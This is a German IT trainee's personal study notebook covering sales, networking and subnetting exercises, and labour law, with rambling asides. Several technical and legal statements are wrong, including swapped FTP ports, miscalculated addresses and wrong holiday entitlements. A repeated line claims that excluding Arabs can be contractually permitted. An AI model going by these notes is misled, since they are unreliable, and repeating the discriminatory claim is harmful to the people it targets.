E-Commerce = Pflege von Shopsystemen. Wert von Haus schätzen. Ich will keine schlauen Kunden – ich will Kunden, die Geld bei mir lassen. Weisses Haus warnt Israel vor weiteren Siedlungsbau von Freeman am Donnerstag, 2. Februar 2017 , unter Palästina, USA | Kommentare (6)

Das Weisse Haus hat I gesagt. “Das sei eklig!” Ein Haus, das sprechen kann. Das sei einmalig.

Presales Tätigkeiten Postsales = Kundenpflege, wird alles nicht bezahlt, muss alles in der Dienstleistung drin sein, vom Kunden.

Vertriebsorgane → Unternehmensintern → Personen und Geschäftsführer, Key Account, Vertriebsleiter, Reisende. Guter Vertriebler sind oberflächlich und schnell.

Dann gibt es Unternehmensexterne, gebunden. -Vertragshändler Bei Dünnebier sind Range Rover Aral-Tankstellen

-Francise-Händler gibt komplette Identität ab McDonalds mit Kindern und ihren Eltern, Eltern müssen auch was essen, weil sie Platz blockieren.

Dann gibt es Unternehmensexterne, ungebunden. B2be. Bsc. Absatzmittler. Absatzhelfer.

Binnenhandelsbetriebe

Kaufhaus = keine lebensmittelabteilung Warenhaus = mit Lebensmittelabteilung

Hussel, Thalia = Douglas GmbH, Herr Kränke Dividende 4 % auf die aktie, als investment schön. Guter Headhunter hat guten Manager, den er beobachtet. Ab mittleren Management sucht man nicht mehr. Deutsche Bank: Freelancer 800E Tagessatz, Freelancer-Pool.

Funktion des Handels: Überbrückungsfunktion, Raumüberbrückung, Zeitüberbrückung, Vordisposition (stelle Sachen her, die schon bestellt sind), Preisfunktion (Bücher haben das nicht) .. .

Handelsvertreter ist selbstständige Gewerbebetreibender, für unternehmen Geschäfte vermittelt, oder in dessen Namen abschließt (Einfirmen- und Mehrfirmenvertreter).

Arbeitet in fremden Namen und fremde Rechnung . Versicherungsvertreter = meistens Handelsvertreter, die sind freiberuflich. Kommissionär Nicht auf eigene Rechnung verkauft.

Makler könne gar nichts, er ist Vermittler zum Anschluss von Verträgen, handelt mit fremd. Namen und Verträgen. Davon gibt es welche, die richtig Kohle haben und welche, die gar keine Kohle haben.

Kontrahierungspolitik

Preispolitik: Ziel: Kaufanreize.

Bedeutung der Preispolitik hat zugenommen. Es gibt noch ungesättigte Märkte, 60% aller Unternehmen hat noch keine Website!

Preiskampf in gesättigten Märkten um Abverkauf. Wachsende Märkte: Um Marktanteil Größere Preistransparenz

Preis- und Konditionenpolitik Vereinbarungen über die für Produkte zu zahlenden Entgelten und ergänz. Regelungen zw. Unternehmen & Kunden (AGB).

Preisänderungsentscheidungen interne Gründe: Löhne .. externe Gründe: Nachfragestrukturveränderungen Gesetzliche Veränderungen

Das magische Dreieck: Kosten, Nachfrage, Konkurrenz, Dreieck schließt sich. In der Mitte: Preis.

Kundengruppen Seniorentarife Pärchenrabatt in Hotels Preisnachlässe für Studenten, Soldaten und Arbeitslose

Penetrationsstrategie Hierbei wird der Preis anfangs möglichst niedrig gehalten, um so schnell einen hohen Marktanteil zu erlangen.

14.9. 2016: SQL und Netzwerke, Automatisches befüllen einer Datenbank mit nmap & Bash

Zum Proxyserver unter Windows kommt an über: Systemsteuerung/Internetoptionen. Dann den Reiter „Verbindungen“ auswählen und „LAN-Einstellungen“ (Local Area Network) auswählen. Unter „Erweitert“ kann am z.B. die IP eines neuen Proxy einsetzen.

In die Medien .. eventuell luft-raumfahrt ?? Aber erst lernen.

Aber, mit meinen Zeichnungen und so .. um das unter einem Hut zu bekommen .. da wäre ich eher der Medienmann .. allerdings, EIN Praktikum bei einem Luftfahrtunternehmen wäre interessant!

Daedelic Studios. Das Studio sucht Leute, die SVN mögen .. als Bestandteil der Systemintegration/IT. SVN googlen.

15.9. Monitoring, Bash-Script, Wiederholung SQL

16.9. Coaching Etherium – Möglichkeiten der Crypto Currency mit Ingo Droß

Mining, Blockchain-Group, etc.. Ein Socket ist ein Kommunikations-Endpunkt.

19.9. Netzwerke: Topologien, OSI-Schichten, Prüfungsaufgaben, IPv4

Wahrheitstabellen. and nand nor or = oder 00 0 00 0 00 1 00 1 01 1 01 0 01 1 01 0 10 1 10 0 10 1 10 0 11 1 11 1 11 0 11 0

Xor = exclusives oder 00 0 xnand (Ungleichheit) xnor (Gleichheit) 10 1 11 0 11 1 01 1 10 1 10 0 11 0 01 1 01 0 00 0 00 1

Netzadressen bestimmen mit zu Hilfenahme von Wahrheitstabelle OR.

128 64 32 16 8 4 2 1 2hoch7 2hoch6 2hoch5 2hoch4 2hoch3 2hoch2 2hoch1 2hoch0 1 1 1 1 1 1 1 1 2 1 Zustand Zustände möglich

Zählt man 128 + 64 + 32 + 16 + 8 + 4 +2 + 1 zusammen, kommt 255 raus und die Null zählt man mit, in der Informatik. Es sind 256 Zustände möglich.

Und jetzt kommt die große Frage:

Du hast eine IP, die heißt: 192. 168. 22. 67 /16

11000000 10101000 00001011 01000011 diese IP hat eine 16er-Subnetmask: 155. 255. 0. 0 11111111 11111111 00000000 00000000

Wie lautet die Netzadresse?

11000000 10101000 00001011 01000011 - 11111111 11111111 00000000 00000000 = 11000000 10101000 00000000 00000000

192.168.0.0

Arp weist IP-Adressen MAC-Adressen zu.

20.9. Netzwerke: Topologien, Spanning Tree, Prüfungsaufgaben, Fahrtkosten berechnen

Markus würde alle Rechner in das 10er-Netz knallen, wenn er dürfte.

Redundanter Aufbau (Hauptswitch sind doppelt).

Redundanz (technisch): zusätzliches Vorhandensein funktional gleicher, oder vergleichbarer Ressourcen, um die Ausfallsicherheit zu erhöhen. Bei störingsfreien Betrieb im Normalfall wird wird sie nicht benötigt.

Ad-Hoc = ist über Funk. Vorteile: Optimale Datenverteilung (Volle Nutzung der Bandbreite).

Ring (Tokenring) Vorteil: Geringer Kabelbedarf, große Netzausdehnung, hohe Sicherheit, keine Kollision. Nachteil: Nur der kann senden, der den Token hat, jeder Rechner braucht zwei Netzwerkkarten.

Bus Vorteil: Leicht erweiterbar, niedriger Kabelbedarf. Nachteil: Mehrere Signale teilen sich das Kabel = Kollision.

Baum Vorteil: Hohe Reichweite; Netzfunktion noch bei Ausfall von höherer Ebene; Gute Erweiterbarkeit; Möglichkeit, strukturierte Netze anzulegen. Nachteil: Hoher Kabelbedarf; komplexe Verkabelung, wenn Verteiler ausfällt;

Vollvermascht Vorteile: Hohe Ausfallsicherheit; kein Routing (weil es nur Direktverbindungen gibt). Nachteil: Hoher Kabelbedarf; hoher Verwaltungsaufwand; schlechte Erweiterbarkeit; komplexe Einrichtung der Umleitung (Routing) eines Kabels.

Teilvermascht Vorteile: Weniger Infrastruktur benötigt Nachteile: komplexe Einrichtung (Routing), weil diese Netze nicht regulär symmetrisch sind, was viele Spezialfälle hervorruft.

Stern Vorteile: Ausfall eines Rechners keine Auswirkungen auf das Gesamtsystem; keine Kollision. Nachteil: Schwere Erweiterbarkeit; Ausfall eines Switches – alle Rechner haben kein Netz.

Access Point Vorteile: mobile Freiheit; kein Stolperkabel Nachteile: Abhörsicherheit befindet sich in der Entwicklung; Wetterbedingungen Spanning Tree Das Spanning-Tree-Protokoll benötigt eine redundante Tree-Struktur, um zu funktionieren. Es sucht sich den günstigsten Pfad aus, um zum Zielrechner zu kommen. Der Rootbridge-Switch wird über die binär niedrigste MAC-Adresse ermittelt. Aber, wenn man zwei Core-Switches hat, werden die nicht die gleiche MAC-Adresse haben. Will man einen anderen Coreswitch zuweisen, wird nicht die MAC geändert, sondern die Bridge-Priorität. Fahrtkosten ermitteln: 10 Millionen durch Übertragungsrate von z.B. 100000000 Bit/s (1 Gigabit).

Ports ports 10/100 1000 cs1 1-8 cs2 1-24 25 e1 1-24 25 e2 1-24 25 Verbindungen ermitteln zu den Switches, die blockiert sind.

Redundante Verbindungen führen in einem geswitchten Netzwerk zu Broadcast-Stürmen außer mit Spanning Tree?

Von 24 (e1) zu cs2 10000000 : 1000000 = 100 Pfadkosten von 25 (e1) zu cs1 10000000 : 1000000 = 10 Pfadkosten (schneller)

Ein Etagenverteiler (e1) kann aber auch das stp haben und daran entscheiden , welchen coreswitch es nehmen will. Bridge priority arbeitet auf schicht 1 und 2 vom osi, bus-topologie (warum das?)

HEX: A3 ist kleiner als D7.

And, Or, Xor und Nand.

FTP: 20 port für steuerungskanal 21 für den datenkanal. 22 = ssh 23 = telnet 25 = smtp 53 = DNS 67 = DHCP-Port 80 = http 110 = Post Office Protokoll POP 123 = ntp 143 = imap 443 = https 7015 = CounterStrike

Unter Windows DHCP aktivieren: Automatisch beziehen (unter Netzwerkeinstellungen). Er gibt einem Computer einen Gateway, DNS und IP.

IMAP = Posteingangstrukturen; bei POP ist nicht zu sehen, wa sman unter imap sehen kann.

ARP weist MAC-Adressen IP-Adressen zu und kommunikation zwischen Switches und clients im lokalen Netzwerk.

„Das Ethernet liegt auf der zweiten Schicht des Osi-Modells, der Sicherungsschicht (im Englischen: Data Link Layer). Da düsen auch die MAC-Adressen herum, die für die Kommunikation zwischen Workstation, Switchern bis zum Router, zuständig sind (Arp-Protokoll für zuständig). Die Router unter sich nutzen ein anderes Protokoll. TCP? Bei einer IP-Vergabe für einen neuen Rechner kann das Paket durchaus über den Router das LAN verlassen und dort von einem DHCP-Server die IP abholen.“

Mac-auflösung. Achtung: kommuniziert außer mit hosts auch mit next-hop-routern. weißt mac-adressen die ip-adressen zu, geht abernicht von router zu router.

Router sind für den Zugang zum Internet zuständig, mittels pppoe (auch dhcp?) Beim Modem musste man früher die Zugangsdaten selbst eingeben, heute macht es der router.

Cmd: auch mit windoes-taste + r erscheint. Zum port freischalten: standardgateway benötigt?

Was, wenn Switche vlan-tagging unterstützen, die netzwerkkarten des client aber nicht?

..

Unterschied logischer & physikalischer Topologie “die physikalische Topologie beschreibt, wie die Geräte durch Kabel miteinainder verbunden sind (die "Strippe" zwischen den Komponenten). Die logische Topologie beschreibt, wie die Komponenten miteinander kommunizieren. Logische und physikalische Topologie müssen nicht identisch sein.”

Routing, Netzplan und Routingtabellen

...später dazu mehr ..

Ein Socket ist ein Kommunikations-Endpunkt.

Blauer Engel, Erp, TCO-Prüfsiegel, Energiesparmodi, (suspend-to-disk, suspend-to-ram)

21.9.2016: Rechnen mit Bits & Bytes, Prüfungsaufgaben, Ipv4, Ipv6

Wenn die Ipv6-Adresse aus der MAC gebildet ist, ist man nicht mehr anonym unterwegs.

Rufus → UEFI-Installation, erstellt bootbare USB-Sticks .. muss aber FAT32 formatiert sein.

Der erste und eindeutigste Unterschied zwischen ipv4 und ipv6: ipv4 = binär, auch Subnetzmasken und so ein Zeug .. verschiedene Adressen .. . ipv6 = hexadezimal, dort wird die Größe eines Subnetzes womöglich direkt im Protokoll mit einem dafür gedachten Abschnitt geregelt.. .

IPv4: Anzahl der Subnetze ermitteln:

Subnetze sind in verschiedene Klassen unterteilt: Da gibt es das Klasse A-Netz, da hat der Bitanteil nur 8 Bit groß. B-Netz: 16 Bit. C-Netz: 24 Bit - Maske.

Bei einem B-Netz, einer 16er-Maske, sind 65535 Netze (Zustände) möglich! 16 hoch 2 = 65536 – 1 = 65535. Die Anzahl der Zustände bekommt man über die Anzahl der Nullen im Geräteteil heraus, also eine 16er-Maske hat 16 Nullen = 2 hoch 16 = 65536 Zustände. Eine 28er-maske hat vier nullen = 2 hoch 4 = 16 Netze (Zustände). Pro Netz sind 14 IP´s verggebbar, weil die IP vom jeweiligen Subnetz und des BC´s abgezogen werden müssen. Der Broadcast wäre bei einem 192.168.0.0 – Netz z.B. 192.168.0.15 und geht bis 255. Das nächste Subnetz fängt bei 192.168.0.16 an. 256 : 16 = 16. 14 * 16 = 224 vergebbare IP's von 0 bis 255. Ich versuche gerade, das von selbst zu verstehen ..

Zählt man 128 + 64 + 32 + 16 + 8 + 4 + 2 + 1 zusammen, kommt 255 raus und die Null zählt man mit, in der Informatik. Es sind 256 Zustände möglich.

Und jetzt kommt die große Frage:

Du hast eine IP, die heißt: 99. 88. 77. 66 /22 01100011 01011000 01001101 01000010 diese IP hat eine 22er-Subnetmask: 255. 255. 252. 0 11111111 11111111 11111100 00000000

Wie lautet die Netzadresse?

Mit zu Hilfenahme von der Wahrheitstabelle AND ..

01100011 01011000 01001101 01000010 - 11111111 11111111 11111100 00000000 =

.. ist es die .. 99. 88. 76. 0 01100011 01011000 01001100 00000000

Anzahl der Nullen im Hostanteil der Maske = 10. Das wäre der Exponent. Dann 2 hoch 10. 2 hoch 10 = 1024 Zustände. Es sind aber 10 nullen vorhanden, was 2 hoch 10 = 1024 Zustände bedeuten würde.

Dieses Subnetz bietet: 1024 mögliche ip's

99.88.76.0 bis 256 sind die ersten 256 IP's. 99.88.77.0 bis 256 sind mit den ersten zusammen 511 99.88.78.0 bis 256 sind mit den ersten und zweiten zusammen 766 99.88.79.0 bis 256 sind mit den ersten und zweiten und dritten zusammen 1024 99.88.79.255 wäre somit der BC des ersten Netzes. von 99.88.76.0 bis 99.88.79.255 geht das Subnetz und es kann 1022 mögliche hosts bedienen. (1024 minus BC minus Netzadresse)

99.88.80.0 ist die Netzadresse des nächst verfügbaren Subnetzes .. inklusuive der drei Bit, die im dritten Block für den Hostanteil zugedacht waren. wenn 99.88.80.0 die netzwerkadresse des nächst verfügbaren subnetzes ist, dann ist 99.88.83.255 der BC des 2. Subnetzes. ..und dann kommt das dritte subnetz ab 99.88.84.0 und das nächste und nächste und wieviele sind es, bis der Hostanteil komplett bei 255.255.255.255 ist? Bzw. wie bekommt man raus, wieviel subnetze man insgesamt aus dieser ip 99.88.77.66 und /22 bilden kann?

Der letztmögliche Broadcast müsste doch bis 99.88.252.255 gehen, weil es sonst in den Netztein rein geht, oder? hatte ich damals für den letztmöglichen BC dieser Aufgabe errechnet.

Mathias sage mir was von 99.88.253.0 und 99.88.255.255, was ich nicht nachvollziehen kann.

Was heißt Netzadresse +1 ?? Ich dachte, ich hätte es jetzt verstanden, aber es ist sooo verwirrend, was in meinen Notizen steht !!!!!! Es ist ernst! Morgen will ich mich mit Markus wirklich zusammen setzen, weil ich befürchte, echt zuwenig verstanden zu haben, damals und deswegen eine schlechte Zwischenprüfung schreiben könnte !!!!!!!!!

1024 : 4 = 256 Netze maximal kann man daraus machen. Jedes Netz hätte eine Netzadresse, 1.IP, 2.IP und der BC.

2 hoch Präfix ist die Anzahl der Subnetze.

(2 hoch 18 Subnetze für was? Für 10.0.0.0 IP´s?) Und es sollen 64 Subnetze möglich sein.

Will man dann die vergebbaren IP's berechnen, müsste man 1024 -128 (-64 Subnetzadressen und -64 Broadcasts) = 896 rechnen. Das wären die vergebbaren IP's, die bis 99.88.76.0 – 79.255 möglich wären, oder? Ist dieses Subnet bis 99.88.76.0 limitiert? Oder, ist es größer?

Es konnte noch mehr Subnetze berechnet werden. Es heißt: anzahl der möglichen Hosts berechnen. 1024 Zustände sind möglich. Wir haben 64 Netze. .. wie kommt man auf diese 64?? Man kommt auf diese 64, indem 11111111 11111111 1 1 1 1 1 1 0 0 00000000 2 4 8 16 32 64 ..die Bits im dritten Block rückwärts gezählt werden und dabei die möglichen Zustände berücksichtigt werden. Die letzte Eins sagt dann, wieviele Subnetze bei einer 22er-Maske möglich sind.

Von denen fallen 64x für Netzadresse und 64x für BC weg 128 1024 * 64 = 65536 -128 65408 Rechner kann man ran stöpseln? Allein im ersten Subnetz sind 765 – 2 = 763 Anschlüsse möglich? Ich vermute mal, es wird gefüllt, bis der Hostanteil der Subnetzmaske mit Subnetzmasken gefüllt sein wird

Cisco-Packet-Tracer, darüber kann man Netzwerke und Subnetze ausprobieren (Funktionierende Netze kann man ergooglen).

Herr Rüdiger sagt: ..27er netz 64 subnetze möglich... , 22 rechner pro netz.

Auf diesen Tag liegt im Ordner der Netzplan mit der Aufgabe, dass in der Filiale Hamburg der Drucker nicht geht und er auf der IP 192.168.1.31 liegt, bei einer 27er-Maske.

Die Rätsels Lösung ist anscheinend, dass man bei der 27er-Maske 11111111 11111111 111111111 11100000 zwei hoch die fünf Nullen des Hostanteils nimmt und dann 32 raus kommt. Diese 32 bestimmt, wie groß ein Subnetz ist und weil 192.168.1.32 die Netzadresse vom neuen Subnetz ist, ist 192.168.1.32 der Broadcast. Aber, wieso das Subnetz so groß sein muss, verstehe ich nicht.Man kann doch auch 32 : 4 rechnen, dann kann man acht kleinstmögliche Subnetze bilden. Aber, von 0 bis 31 ist nur ein Subnetz möglich, aber da es 32 gibt, heißt es ja, dass es mehr Subnetze geben darf. Oder, .. ich blick da gar nicht mehr durch. Markus soll mir das noch mal erklären.

Ich will wissen: 1. Wie viel mögliche Subnetze man mit 192.168.1.0/27 erzeugen kann und wie man das berechnet? 2. und wieso diese 32 bestimmt, wie groß das Subnetz ist?

Folgende aufgabe hatte am heutigen Tag Markus aus einer Prüfung vom letzten Jahr gemacht: In dem firmennetzwerk LAN Hamburg kann man über die 192.168.1.0/27 auf der IP 192.168.1.31 den Drucker nicht erreichen. Begründet wird das, weil die 192.168.1.31 der BC eines Subnetzes ist. Die Größe eines Subnetzes ließe sich mit 2 hoch der Nullen im Hostanteil berechnen, in diesem Falle 2 hoch 5 gleich 32. 32, so groß wäre ein Subnetz und 31 ist der BC und 32 das neue Subnetz. Wenn es ein neues subnetz gibt, sind unter dieser IP mehr Subnetze möglich, oder? Ich habe mal gehört, dass man an der Subnetzmaske irgend was runter zählen muss, um die Gesamtzahl an Subnetzen, die überhaupt möglich sind, zu erhalten. 16 Subnetze insgesamt wären möglich.

Wenn man es unterteilt in subnetze, geht eine immer für bc und netzaddr weg.

// 78.0/24 daraus könnte ich 24 machen mit unterteilung, vier subnetze. Aber will ich gar nicht wissen. wenn es ins 2. Subnetz geht Das Gateway muss noch ein anderes interface haben und wissen, dass da hinter das Internet liegt. // die gehen bis alles 1 im hostanteil.

kann es sein, dass es gar nicht größer werden kann, weil man von 76 bis 79 die drei Bit ausgeschöpft hat, die im dritten Block für den Host-Anteil zugeteilt waren?

Ich habe hier noch eine Aufgabe stehen, in der es heißt: 60.176.0.0 = Netzadresse 60.176.0.1 = Erste vergebbare IP aber dann: 60.191.255.255 Was der Broadcast sein soll .. 60.192.0.0 = Soll das nächste Netz sein .. 60.207.255.255 = Der BC des nächsten Netzes .. Was passiert hier?

Kann es sein, dass die 60.176.0.0 nur die Netzadresse eines Subnetzes von einer 12er – Subnetzmaske ist??

22.9.2016: Rechnen mit IPs, IPv4 & IPv6, Prüfungsaufgaben und Kleine Zusammenfassung (ab 18.9. bis jetzt)

Markus wiederholte Netzwerke und fügte ein Wenig Neuerung hinzu.

Subnetzmasken: Der Adressteil der Maske bestimmt, wie das Subnetz heißt.

Absende- und Ziel-MAC-Adressen wechseln bei einem neuen Subnetz.

Subnetze berechnen, bis zum endgültigen broadcast ..

---dazu später mehr .. Ja wie eigentlich? Doch interessant, oder?

Ohne Datum IPv6: Ipv6 und Subnetzmaske

Ein weniger eingängiges Beispiel ist 2001:0db8:85a3:08d3:1319:8a2e:0370:7347/57, das zugehörige Netz ist 2001:0db8:85a3:0880:0000:0000:0000:0000/57 und enthält die Adressen 2001:0db8:85a3:0880:0000:0000:0000:0000 bis 2001:0db8:85a3:08ff:ffff:ffff:ffff:ffff, von denen auch einige für Sonderfunktionen bestimmt sind.

Adressraum der 2001:db8:AAAA:BB00::/56 in vier gleich große Teile aufteilen

Präfix, Standardgateway, DNS-Server: ← Warum steht das hier ??

56 kann man nicht vergeben, weil Netzadresse??

Was ist der Broadcast einer ipv6-Adresse?? Fe01 ffff ffff ffff ffff ffff ffff ffff ??

Flags: Bestimmen, ob sie permanent sind, oder nicht.

Und was sind flags? “Mit Flag [flæg] (auf Deutsch etwa Markierung) wird ein Statusindikator bezeichnet, der als Hilfsmittel zur Kennzeichnung bestimmter Zustände benutzt werden kann. Ein Flag kann gesetzt, gelöscht oder geprüft werden.” wir lernten, wie man sie an den nullen verkürzt und so .. . ipv6-Adressbereiche die ipv6-Adressen sind 128 bit groß; mac = 48 bit; ip/mask = 32 bit

IPv6 und die vier Netze und das Rechnen mit hexadezimalen Zahlen.

Die Verdoppelung von Subnetzen über die Erhöhung des Hostanteils einer Subnetzmaske um 1.

26.9.2016 Betrieb und Umfeld mit Herrn Pöppl

Fachkräftemangel

Kündigungsrecht

Arbeitszeugnis

Der Dozent sagt: Das Fachbuch, das wir mitbekommen haben, ist wichtig für die Abschlussprüfung (weil es nach den Fragen der IHK gemacht worden ist)

Steiniger, Trümmerteile fallen auf Segelschiffe und Riesenkerle kämpfen gegen einen kleinen Jungen mit Strohhut, der seine Beine ganz lang machen kann .. freiwillige Selbstkontrolle und Arbeitgeberrechte Buchhaltung Betriebsrecht Arbeitnehmerrecht. Der Admiral schaut sich während des Kampfes die Buchhaltung an und mit dem Amerikabomber wollte Adolf Hitler noch den Krieg gewinnen, obwohl die Russen schon in Hohenschönhausen standen – die Atombombe hätte 1946 einsatzbereit gewesen sein sollen, doch ab dem 8. Mai 1945 konnte sie nicht mehr weitergebaut werden, weil Adolf Hitler einfach wegstarb!

Hätte er mal beim Ministerium für Arbeit und Soziales angerufen, dann hätte er mehr über seinen Job gewusst!

Glücklicherweise gibt es jetzt ein Gesetz, wo nach 9 Monaten geregelt ist, dass die Zeitarbeit in ein geregeltes Mindestlohnverhältnis übergehen soll – blöd nur, wenn die Zeitarbeitsfirma dann einen kündigt vor Abschluss von sechs Monate, bevor es mit dem geregelten Verhältnis. unumkehrbar ist.

Stellenbeschreibung: Vorteile für den Arbeitgeber, man kriegt Kurse spendiert. Wenn man mit Arabern nicht kann, muss es im Arbeitsvertrag rein geschrieben sein – es muss definiert sein, dann ist es gestattet.

Job Enrichment (wo man in andere Bereiche der Firma rein schnuppern darf).

Betriebsrat (geht erst ab 20 nach Tariflohn gezahlten Mitarbeitern) gfb anderen thema. Betriebsräte wissen meist mehr über Betriebsinterna.

BetrVG = Betriebsverfassungsgesetz Wenn man mit Arabern nicht kann, muss es im Arbeitsvertrag rein geschrieben sein – es muss definiert sein, dann ist es gestattet.

Weisungsrecht (Direktionsrecht)

Arbeitsplatzschutzverordnung, Berufsgenossenschaft

Arbeitgeber = Arbeitgeber-Verband

Arbeitnehmer = Gewerkschaft Arbeitssoll Fürsorgepflicht = Schutz des Arbeitnehmers gegen Mobbingattacke von Kollegen.

Arbeitsort: Der Einsatz im Ausland muss vorher ausdrücklich vereinbahrt werden (Sabbatical), wenn wichtige Person unbezahlt mal für ein halbes Jahr weggeht, ohne von der Firma entlassen zu werden .. Nachtrag.

Wettbewerbsverbot man darf nicht das Betriebsgeheimnis an andere Firmen weiter verkaufen und nicht gegen die ehemalige eigene Firma konkurrieren, glaub ich.

Zeitweilige Befreiung von der Arbeitspflicht Kurzarbeit

Nebenpflichten des Arbeitnehmers Verschwiegenheitspflicht, mündl. Oder schriftl. Arbeitsverträge, Betriebsgeheimnis muss gewahrt werden (sonst geschäftsschädigend) – besonders ingenieure und Entwickler betroffen.

Sabbatical wenn wichtige Person mal für ein halbes ahr unbezahlt weg geht.

Entgeltzahlungspflicht

Entgeltformen Lohn = mit Händen Gehalt = geistig Azubi = Vergütung Künstler = Gage Akkordlohn = nach Stückzahlen Provision = Eine Beteiligung am Gewinn aus den Aufträgen, die man für eine Firma ermittelt.

Arbeitsentgelt kann auch Sachbezüge vom Arbeitgeber bedeuten. BMW-Mitarbeiter verdient 4000 Euro im Monat.

Pflichten des Arbeitnehmers & Arbeitgebers

Pflichten des Arbeitnehmers Unternehmer hat das Recht, in Daten einzusehen. Maschinen kaputt schlagen wird bestraft, klar .. aber sonst??

Pflichten des Arbeitgebers Mindestlohn von 8,50 (soll vor Lohndumping schützen) .. Tarifvertrag. Arbeitgeber darf keine Auskunft geben über Einkommen (gegenüber dritten wahrscheinl.). -Entgeltzahlungspflicht

-Entgeltformen

Lohn = mit Händen Geistig = mit Gehalt

Reisespesen

Auszahlung des Arbeitsentgelts Abrechnung

Entgeltsicherung

Pfändungsrecht

Entgeltzahlung ohne Arbeit -Entgeltzahlung im Krankheitsfall -Entgeltzahlung bei sonstigen persönlichen Hinderungsgründee Kein Anspruch auf Entgelt bei:

Verletzung der Arbeitnehmerpflichten Entgeltminderung: Bewusstes Langsam- oder Schichtarbeiten

Erfolgreiche Unternehmer haben sehr loyale Mitarbeiter. Dingolfing BMW.

Haftung des Arbeitnehmers gegenüber Dritten und Zwitter.

Unternehmen: Hat Haftpflichtversicherung, alle Mitarbeiter versichert, die Kunden und Mitbewerber schaden zufügen. Kinnhaken deckt hafti nicht ab.

Bei Aktienkauf: Muss Bankmensch Beraten einen Käufer: Aufklärungs .. dingsbums

Mankohaftung: Fehler, verschulden. In der Kasse, fehlerhafter Betrag. Arbeitnehmer haftet nur bei Verschulden.

Den clown rauslassen.

Gleichbehandlungsgesetz Benachteiligungsverbot (doch wer kann das nnach weisen)? BVG, BSR = haben Beauftragte, die auf Einhaltung des Gesetzes achten

Pflicht zum Schutz von Leben und Gesundheit des Arbeitnehmers Berufsgenossenschaften prüfen Sicherheit im Unternehmen (Jeder Arbeitnehmer zahlt Beiträge). Bei ihnen wird eine Lohnsumme aller Mitarbeiter zusammengezählt. Faktor. Geleistete Arbeitsstunden Risikofaktor. Unfallschutz

Durch Jugendarbeitsschutzgesetz Kinder & Jugendliche besonderen Schutz. Bei Verstößen Arbeitgeber in das Gewerbezentralregister Gewerbeanmeldung: 13 Euro.

Gewerbestättenverordnung: Beispiel Lichteinfall: So und soviel lux pro Quadratmeter muss nötig sein. Bildschirmarbeitsplatzverordnung: Mindestens 45 cm Abstand zw. Gesicht & Bildschirm.. Man kann verlangen, eine hochwertige Tastatur zu bekommen; Bürostuhl muss ergonomisch gestaltet sein. Wenn überwiegend sitzen, hat er Anspruch auf einen stehenden Arbeitsplatz. Vibrationsarbeitsschutzverordnung.

Bundesdatenschutzgesetz Muss nur Auskunft geben auf Geschlecht, Sprachkenntnisse, Familienstand, Schule&Ausbildung. Referenzrahmen, europäische Norm. .. auch in Portugal verwendet. Hochenglisch: Stratford upon Tylon, Birmingham.

Fachdolmetscher sind gute Verdiener.

Pflicht zum Schutz des Eigentums des Arbeitnehmers

Bundesurlaubsgesetz Pflicht zur Urlaubgsgewährung Mindesturlaub. Unterschritten dürfen die 24 Tage nicht.

Jugendarbeitsschutzgesetz Über 17: Mindestens 30 Tage. Ab 18: 40 Tage.

Urlaub zu zwölften. Bei drei Monate Arbeit vier Tage Urlaub.

Urlaub muss Betrieb gewähren, bestimmte Zeiten, sonst kann Betrieb Lizenz entzogen werden.

Urlaub kann verfallen.

Ausgleichszeit von 6 Monaten dürfen 8 std. pro tag nicht überschritten werden. Man kriegt schon bezahlt, aber nicht alles steht in Lohnauswertung.

Bei unerwarteter Pflegebedürftigkeit (nur verwandte 1.Grades) kann man bezahlt 10 Tage fern bleiben. Pflegebedürftigkeit bestimmt die Krankenkasse – fünf Pflegestufen.

S. 73/74: Pflichten des Arbeitgebers: 1. Arbeitgeber verstößt: a) Urlaubsgewährung, auch Pflicht zum Schutz von Leben und Gesundheit b) Beschäftigungspflicht, (dazu wissensvermittlungspflicht) auch Gleichbehandlungsgesetz. c) Lohn– und Gehaltzahlungspflicht, auch Personalakteneinsicht. Chef darf nicht in Teilen zahlen. d) Pflicht zum Schutz von Leben und Gesundheit e) Beschäftigungspflicht, )Gleichbehandlungsrecht, Ausbildungsrahmenplan muss eingehalten werden). f) (Pflicht zum Schutz von Leben und Gesundheit, muss sich auch mal erholen) Gleichbehandlung, Gegen Überstunden, oder Jugendschutzrecht g) Fürsorgepflicht, Personalakteneinsicht. h) Pflicht auf Erstellung eines Arbeitszeugnisses, Fürsorgepflicht, Verschwiegenheitspflicht i) Verschwiegenheitspflicht

2. Einsicht Persoakte: a), nein c.

3. Wettbewerbsverbot: b) bis zu zwei jahre nach beendingung des arbeitsverhältnisses gilt das Wettbewerbsverbot.

Es gibt Anwälte, die sind spezialisiert im Arbeitsrecht.

Ausbildungs- und Arbeitsverträge Bewerbung: Zeugnis, Referenzen (Google geht gar nicht danach .. man soll einem achtjährigen Kind einen Router erklären). Vorstellungsgespräch → in Mode: Überprüfen .. psychologisch streß gemacht wird. Assessment-Centers. Assessment: Bewerten, Einschätzen. Googlen, sich damit auseinandersetzen. 10 minuten

Wie wird ein Arbeitsvertrag abgeschlossen? Kann schriftlich, oder mündlich geschlossen werden. Schriftform empfohlen. Innerhalb eines Monats ist A-Geber verpflichtet- dem A-Nehmer eine Niederschrift einzureichen, nach mündlichem Arbeitsvertrag.

Abschlussfreiheit und ihre Grenzen 5% von 20 = 1 Schwerbehinderte einstellen verpflichtet. Sonst Ausgleichsabgabe (115 E pro Monat).

Öffentlicher Dienst Jeder Deutsche hat nach seiner Eignung, Befähigung & fachl. Leistung Zugang zu jedem Amt.

Formvorschriften Aubilder muss Niederschrift direkt nach Einsteelung innerh. Eines Monats bei der IHK einzureichen.

Minderjährige Arbeitnehmer Kein A-Vertrag mit unter 15-Jährigen (nicht vertragsmündig).

Freiheit zur Gestaltung des Arbeitsvertrags und ihre Grenzen

Dauer des Arbeitsvertrags. Befristungen sind nur wirksam, wenn sie schriftlich vereinbahrt wurden. Befristung im Anschluss an eine Ausbiildung erfolgt .. polnische Stuckateure sind gut. ..siehe PDF ..

Vorrang von Tarifverträgen

Probezeit Sie soll sechs Monate nicht überschreiten Gibt auch bis zu zwei Jahre, oder einem Jahr (chief technical officer on Siemens).

Arbeitspapiere zur Beschäftigung dokumentieren. Bescheinigung für den Lohnsteuerabzug.

Arbeitszeugnis Was steht drin?

Überschrift

Einleitung Name, Dauer der Beschäftigung, Position

Beruflicher Werdegang: Da steht, in welchen Abteilungen der Firma er überall gearbeitet hatte.

Aufgabenbeschreibung: Leistungsbeurteilung: Welche Form müssen Zeugnisse haben Ausrufezeichen dürfen nicht verwendet werden (weil es eine Verniedlichung ist). Auch keine kursive Schrift.

Verhaltensbeurteilung: Verhaltensbeurteilung von 1 bis 6.

